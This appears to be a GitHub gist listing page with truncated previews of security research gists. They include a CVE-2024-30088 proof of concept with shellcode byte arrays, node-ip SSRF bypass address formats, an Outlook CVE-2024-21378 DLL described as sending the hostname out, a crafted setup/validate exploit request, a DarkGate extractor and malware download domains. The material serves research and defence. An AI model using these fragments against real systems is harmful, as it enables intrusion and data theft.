This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// CVE-2024-30088 PoC - @carrot_c4k3 (exploits.forsale) | |
// | |
let get_token_handle_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x48,0x48,0xc7,0x44,0x24,0x38,0x0,0x0,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0xff,0x10,0x4c,0x8d,0x44,0x24,0x38,0xba,0x0,0x0,0x0,0x2,0x48,0x8b,0xc8,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x8,0xc7,0x44,0x24,0x30,0x0,0x0,0x0,0x0,0x48,0x8d,0x44,0x24,0x30,0x48,0x89,0x44,0x24,0x20,0x41,0xb9,0x0,0x20,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0x4c,0x8b,0x40,0x18,0xba,0x16,0x0,0x0,0x0,0x48,0x8b,0x4c,0x24,0x38,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x10,0x48,0x8b,0x44,0x24,0x50,0x48,0x8b,0x4c,0x24,0x38,0x48,0x89,0x48,0x40,0x8b,0x44,0x24,0x30,0x48,0x83,0xc4,0x48,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc] | |
let create_smash_thread_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x38,0x48,0xc7,0x44,0x24,0x28,0x0,0x0,0x0,0x0,0xc7,0x44,0x24,0x20,0x0,0x0,0x0,0x0,0x4c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x4c,0x8b,0x40,0x28,0x33,0xd2,0x33,0xc9,0x48,0x8b,0x44,0x24,0x40,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0xcc |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <assert.h> | |
#include <Windows.h> | |
// Some of them were taken (and modified) from https://github.com/winsiderss/systeminformer | |
typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
{ | |
BOOLEAN SecureKernelRunning : 1; | |
BOOLEAN HvciEnabled : 1; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2024-29415 represents a significant security vulnerability in the node-ip package, a popular Node.js library used to retrieve IPv4 addresses. This library, instrumental in many server-side applications, has been identified as containing a serious flaw in its IP address classification function, isPublic(). This flaw can lead to Server-Side Request Forgery (SSRF) attacks when private IP addresses are misclassified as public. | |
Vulnerability Description | |
The core issue lies in the isPublic() function, which incorrectly identifies certain IP address formats as public, even when they represent private or reserved addresses. Notable examples of such misclassifications include: | |
127.1 | |
01200034567 | |
012.1.2.3 | |
000:0:0000::01 | |
::fFFf:127.0.0.1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations/ | |
import argparse | |
import random | |
import win32com.client | |
def insert_digit(word, digit): | |
pos = random.randint(1, len(word) - 1) | |
return word[:pos] + digit + word[pos:] | |
def generate_command(url, file_path): |
Thank you to SpecterOps for supporting this research, to Elad for helping draft this blog, and to Sarah, Daniel, and Adam for proofreading and editing! Crossposted on the SpecterOps Blog.
What follows is the culmination of two years of research with funding by SpecterOps and contributions from many of my coworkers.
Special thanks are needed to Elad, Lee, Will, Daniel, and Kai. Elad, Lee, and Will have contributed several ideas to the project, which are documented here, and have each spent multiple days testing the tool. Daniel has answered all of my inevitable questions about AzureAD (whoops, now Ent
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys , pefile , validators , re , base64 | |
''' | |
Author: Mohamed Ashraf (@X__Junior) | |
Usage: | |
python3 darkgate.py path_to_sample | |
''' | |
def is_ascii(s): | |
return all(ord(c) < 128 or ord(c) == 0 for c in s) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /api/setup/validate HTTP/1.1 | |
Host: localhost:3000 | |
Content-Length: 416 | |
Accept: application/json | |
Content-Type: application/json | |
User-Agent: Mozilla/5.0 | |
Connection: close | |
{"token":"d66c72f1-ddf7-4d55-aaff-53ffbd4fbb7b","details":{"details":{ | |
"subprotocol":"h2", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Next Stage Download Domains: | |
asuxtp.fun | |
bisiv.top | |
dubpv.top | |
eovze.fun | |
fyzyxe.top | |
igsufb.top | |
izrvb.top | |
lvuse.top |
NewerOlder